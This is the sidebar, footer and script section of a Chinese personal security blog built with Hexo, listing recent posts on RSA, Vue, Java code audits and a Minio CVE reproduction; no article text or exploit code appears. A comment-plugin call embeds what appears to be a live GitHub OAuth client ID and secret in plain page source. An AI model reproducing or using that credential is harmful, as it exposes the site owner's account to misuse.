class="card-content"><h3 class="menu-label">最新文章</h3><article class="media"><div class="media-content"><p class="date"><time dateTime="2023-05-09T02:29:07.847Z">2023-05-09</time></p><p class="title"><a href="/2023/05/09/rsalearn/">RSA算法学习</a></p><p class="categories"><a href="/categories/crypto/">crypto</a> / <a href="/categories/crypto/%E5%AD%A6%E4%B9%A0/">学习</a></p></div></article><article class="media"><div class="media-content"><p class="date"><time dateTime="2023-04-11T06:16:23.823Z">2023-04-11</time></p><p class="title"><a href="/2023/04/11/vueLearn/">Vue框架学习</a></p><p class="categories"><a href="/categories/front/">front</a> / <a href="/categories/front/%E5%AD%A6%E4%B9%A0/">学习</a></p></div></article><article class="media"><div class="media-content"><p class="date"><time dateTime="2023-04-07T13:48:33.394Z">2023-04-07</time></p><p class="title"><a href="/2023/04/07/ofcms/">ofcms-V1.1.2审计</a></p><p class="categories"><a href="/categories/JavaSec%E5%AD%A6%E4%B9%A0/">JavaSec学习</a></p></div></article><article class="media"><div class="media-content"><p class="date"><time dateTime="2023-04-03T04:10:40.364Z">2023-04-03</time></p><p class="title"><a href="/2023/04/03/minio2023/">Minio信息泄露---CVE-2023-28432</a></p><p class="categories"><a href="/categories/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/">漏洞复现</a></p></div></article><article class="media"><div class="media-content"><p class="date"><time dateTime="2023-04-01T13:05:18.732Z">2023-04-01</time></p><p class="title"><a href="/2023/04/01/oasys/">经典oasys(OA自动化办公系统)审计</a></p><p class="categories"><a href="/categories/JavaSec%E5%AD%A6%E4%B9%A0/">JavaSec学习</a></p></div></article></div></div><div class="card widget"><div class="card-content"><div class="menu"><h3 class="menu-label">分类</h3><ul class="menu-list"><li><a class="level is-mobile is-marginless" href="/categories/CTF/"><span class="level-start"><span class="level-item">CTF</span></span><span class="level-end"><span class="level-item tag">14</span></span></a></li><li><a class="level is-mobile is-marginless" href="/categories/Go/"><span class="level-start"><span class="level-item">Go</span></span><span class="level-end"><span class="level-item tag">1</span></span></a><ul class="mr-0"><li><a class="level is-mobile is-marginless" href="/categories/Go/%E5%AD%A6%E4%B9%A0/"><span class="level-start"><span class="level-item">学习</span></span><span class="level-end"><span class="level-item tag">1</span></span></a></li></ul></li><li><a class="level is-mobile is-marginless" href="/categories/JavaSec%E5%AD%A6%E4%B9%A0/"><span class="level-start"><span class="level-item">JavaSec学习</span></span><span class="level-end"><span class="level-item tag">10</span></span></a></li><li><a class="level is-mobile is-marginless" href="/categories/Misc/"><span class="level-start"><span class="level-item">Misc</span></span><span class="level-end"><span class="level-item tag">1</span></span></a><ul class="mr-0"><li><a class="level is-mobile is-marginless" href="/categories/Misc/%E5%AD%A6%E4%B9%A0/"><span class="level-start"><span class="level-item">学习</span></span><span class="level-end"><span class="level-item tag">1</span></span></a></li></ul></li><li><a class="level is-mobile is-marginless" href="/categories/crypto/"><span class="level-start"><span class="level-item">crypto</span></span><span class="level-end"><span class="level-item tag">1</span></span></a><ul class="mr-0"><li><a class="level is-mobile is-marginless" href="/categories/crypto/%E5%AD%A6%E4%B9%A0/"><span class="level-start"><span class="level-item">学习</span></span><span class="level-end"><span class="level-item tag">1</span></span></a></li></ul></li><li><a class="level is-mobile is-marginless" href="/categories/csapp/"><span class="level-start"><span class="level-item">csapp</span></span><span class="level-end"><span class="level-item tag">2</span></span></a><ul class="mr-0"><li><a class="level is-mobile is-marginless" href="/categories/csapp/%E5%AD%A6%E4%B9%A0/"><span class="level-start"><span class="level-item">学习</span></span><span class="level-end"><span class="level-item tag">2</span></span></a></li></ul></li><a class="level is-mobile is-marginless" href="/categories/"><span class="level-start"><span class="level-item">查看全部&gt;&gt;</span></span></a></ul></div></div></div><div class="card widget"><div class="card-content"><div class="menu"><h3 class="menu-label">归档</h3><ul class="menu-list"><li><a class="level is-mobile is-marginless" href="/archives/2023/05/"><span class="level-start"><span class="level-item">五月 2023</span></span><span class="level-end"><span class="level-item tag">1</span></span></a></li><li><a class="level is-mobile is-marginless" href="/archives/2023/04/"><span class="level-start"><span class="level-item">四月 2023</span></span><span class="level-end"><span class="level-item tag">4</span></span></a></li><li><a class="level is-mobile is-marginless" href="/archives/2023/03/"><span class="level-start"><span class="level-item">三月 2023</span></span><span class="level-end"><span class="level-item tag">5</span></span></a></li><li><a class="level is-mobile is-marginless" href="/archives/2023/02/"><span class="level-start"><span class="level-item">二月 2023</span></span><span class="level-end"><span class="level-item tag">2</span></span></a></li><li><a class="level is-mobile is-marginless" href="/archives/2022/11/"><span class="level-start"><span class="level-item">十一月 2022</span></span><span class="level-end"><span class="level-item tag">4</span></span></a></li><a class="level is-mobile is-marginless" href="/archives/"><span class="level-start"><span class="level-item">查看全部&gt;&gt;</span></span></a></ul></div></div></div><!--!--><div class="card widget" data-type="subscribe-email"><div class="card-content"><div class="menu"><h3 class="menu-label">订阅更新</h3><form action="https://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open(&#039;https://feedburner.google.com/fb/a/mailverify?uri=&#039;,&#039;popupwindow&#039;,&#039;scrollbars=yes,width=550,height=520&#039;);return true"><input type="hidden" value="" name="uri"><input type="hidden" name="loc" value="en_US"><div class="field has-addons"><div class="control has-icons-left is-expanded"><input class="input" name="email" type="email" placeholder="Email"><span class="icon is-small is-left"><i class="fas fa-envelope"></i></span></div><div class="control"><input class="button" type="submit" value="订阅"></div></div></form></div></div></div><!--!--><div class="column-right-shadow is-hidden-widescreen"></div></div></div></div></section><footer class="footer"><div class="container"><div class="level"><div class="level-start"><a class="footer-logo is-block mb-2" href="/">秋秋晚</a><p class="size-small"><span>&copy; 2023 秋秋晚</span>  Powered by <a href="https://hexo.io/" target="_blank">Hexo</a> &amp; <a href="https://github.com/ppoffice/hexo-theme-icarus" target="_blank">Icarus</a> &amp; <a href="https://github.com/removeif/hexo-theme-amazing" target="_blank">Amazing</a> <br><span><span id="statistic-times">loading...</span><script>function createTime(time) {
            var n = new Date(time);
            now.setTime(now.getTime() + 250),
                days = (now - n) / 1e3 / 60 / 60 / 24,
                dnum = Math.floor(days),
                hours = (now - n) / 1e3 / 60 / 60 - 24 * dnum,
                hnum = Math.floor(hours),
            1 == String(hnum).length && (hnum = "0" + hnum),
                minutes = (now - n) / 1e3 / 60 - 1440 * dnum - 60 * hnum,
                mnum = Math.floor(minutes),
            1 == String(mnum).length && (mnum = "0" + mnum),
                seconds = (now - n) / 1e3 - 86400 * dnum - 3600 * hnum - 60 * mnum,
                snum = Math.round(seconds),
            1 == String(snum).length && (snum = "0" + snum),
                document.getElementById("statistic-times").innerHTML = "❤️本站自 <strong>"+time.split(" ")[0].replace(/\//g,".")+"</strong> 已运行 <strong>" + dnum + "</strong> 天 <strong>" + hnum + "</strong> 小时 <strong>" + mnum + "</strong> 分 <strong>" + snum + "</strong> 秒！❤️";
        }var now = new Date();setInterval("createTime('2021/12/31 00:00:00')", 250,"");</script><br></span><div class="size-small"><span>❤️感谢 <strong><span id="busuanzi_value_site_uv">99+</span></strong> 小伙伴的 <strong><span id="busuanzi_value_site_pv">99+</span></strong> 次光临！❤️</span></div></p></div><div class="level-end"><div class="field has-addons"><p class="control"><a class="button is-transparent is-large" target="_blank" rel="noopener" title="Creative Commons" href="https://creativecommons.org/"><i class="fab fa-creative-commons"></i></a></p><p class="control"><a class="button is-transparent is-large" target="_blank" rel="noopener" title="Attribution 4.0 International" href="https://creativecommons.org/licenses/by/4.0/"><i class="fab fa-creative-commons-by"></i></a></p><p class="control"><a class="button is-transparent is-large" target="_blank" rel="noopener" title="Download on GitHub" href="https://github.com/removeif/hexo-theme-amazing"><i class="fab fa-github"></i></a></p></div></div></div></div></footer><script src="https://cdnjs.loli.net/ajax/libs/moment.js/2.22.2/moment-with-locales.min.js"></script><script src="https://cdnjs.loli.net/ajax/libs/clipboard.js/2.0.4/clipboard.min.js" async></script><script>moment.locale("zh-CN");</script><script>var IcarusThemeSettings = {
            article: {
                highlight: {
                    clipboard: true,
                    fold: 'unfolded'
                }
            }
        };</script><script src="/js/column.js"></script><script src="/js/animation.js"></script><a id="back-to-top" title="回到顶端" href="javascript:;"><i class="fas fa-chevron-up"></i></a><script src="/js/back_to_top.js" defer></script><!--!--><!--!--><!--!--><script src="https://cdnjs.loli.net/ajax/libs/lightgallery/1.6.8/js/lightgallery.min.js" defer></script><script src="https://cdnjs.loli.net/ajax/libs/justifiedGallery/3.7.0/js/jquery.justifiedGallery.min.js" defer></script><script>window.addEventListener("load", () => {
            if (typeof $.fn.lightGallery === 'function') {
                $('.article').lightGallery({ selector: '.gallery-item' });
            }
            if (typeof $.fn.justifiedGallery === 'function') {
                if ($('.justified-gallery > p > .gallery-item').length) {
                    $('.justified-gallery > p > .gallery-item').unwrap();
                }
                $('.justified-gallery').justifiedGallery();
            }
        });</script><!--!--><!--!--><!--!--><script src="/js/main.js" defer></script><script>$.getScript('/js/comment-issue-data.js',function(){loadIssueData('9901fc9cd07fca97d9c5','676e4024a92c4843a002172e7c57dd2a9875f238','LHXHL','blog_comment',false);})</script><div class="searchbox"><div class="searchbox-container"><div class="searchbox-header"><div class="searchbox-input-container"><input class="searchbox-input" type="text" placeholder="想要查找什么..."></div><a class="searchbox-close" href="javascript:;">×</a></div><div class="searchbox-body"></div></div></div><script src="/js/insight.js" defer></script><script>document.addEventListener('DOMContentLoaded', function () {
            loadInsight({"contentUrl":"/content.json"}, {"hint":"想要查找什么...","untitled":"(无标题)","posts":"文章","pages":"页面","categories":"分类","tags":"标签"});
        });</script><script src="https://cdn.jsdelivr.net/npm/pjax@0.2.8/pjax.js"></script><script type="text/javascript">var pjax = new Pjax({
            elements: "a",//代表点击链接就更新
            selectors: [  //代表要更新的节点
                ".section",
                "title"
            ],
            cache: true,
            cacheBust:false
        })

        function loadBusuanzi(){
        $.getScript("//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js", function () {});
        }

        function loadMathJax() { //加载mathjax
            $.getScript("//cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.4/MathJax.js?config=TeX-MML-AM_CHTML", function () {
                MathJax.Hub.Config({ tex2jax: { inlineMath: [['$', '$'], ['\(', '\)']] } });
                var math = document.getElementsByClassName("entry-content")[0];
                MathJax.Hub.Queue(["Typeset", MathJax.Hub, math]);
            });
        };

        // 开始 PJAX 执行的函数
        document.addEventListener('pjax:send', function () {
        });
        
        // PJAX 完成之后执行的函数，可以和上面的重载放在一起
        document.addEventListener('pjax:complete', function () {
            $(".section").css({opacity:1});
            if(false){
                $.getScript('/js/comment-issue-data.js',function(){loadIssueData('9901fc9cd07fca97d9c5','676e4024a92c4843a002172e7c57dd2a9875f238','LHXHL','blog_comment',false);});
            }
            if(false){
                loadMathJax();
            }
            loadMainJs(jQuery, window.moment, window.ClipboardJS, window.IcarusThemeSettings);
            loadBackTop();
            loadBusuanzi();
            if(typeof loadBanner == 'function'){
                loadBanner();
            }
        });</script></body></html>